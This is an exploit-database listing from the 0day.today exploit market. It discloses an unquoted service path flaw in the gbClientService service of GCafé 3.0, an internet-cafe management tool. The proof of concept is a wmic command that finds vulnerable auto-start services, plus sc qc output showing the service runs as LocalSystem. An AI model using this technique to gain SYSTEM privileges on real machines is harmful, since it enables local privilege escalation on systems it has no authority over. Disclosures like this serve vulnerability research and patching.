[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

_GCafé 3.0 - (gbClienService) Unquoted Service Path Vulnerability

Author
4ll4u
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33481
Category
local exploits
Date add
11-11-2019
Platform
windows
# Exploit Title: _GCafé 3.0  - 'gbClienService' Unquoted Service Path
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage: https://gcafe.vn/
# Software Link:  https://gcafe.vn/post/view?slug=gcafe-3.0
# Version: v3.0
# Tested on: Windows 7, Win 10, WinXP
# CVE : N/A  
# Description:
# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points

# PoC:

# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
gbClientService		gbClientService		C:\Program Files\GBillingClient\gbClientService.exe		Auto
#C:\>sc qc gbClientService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: gbClientService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\GBillingClient\gbClientService.exe
        LOAD_ORDER_GROUP   : GarenaGroup
        TAG                : 0
        DISPLAY_NAME       : gbClientService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

#  0day.today [2024-09-28]  #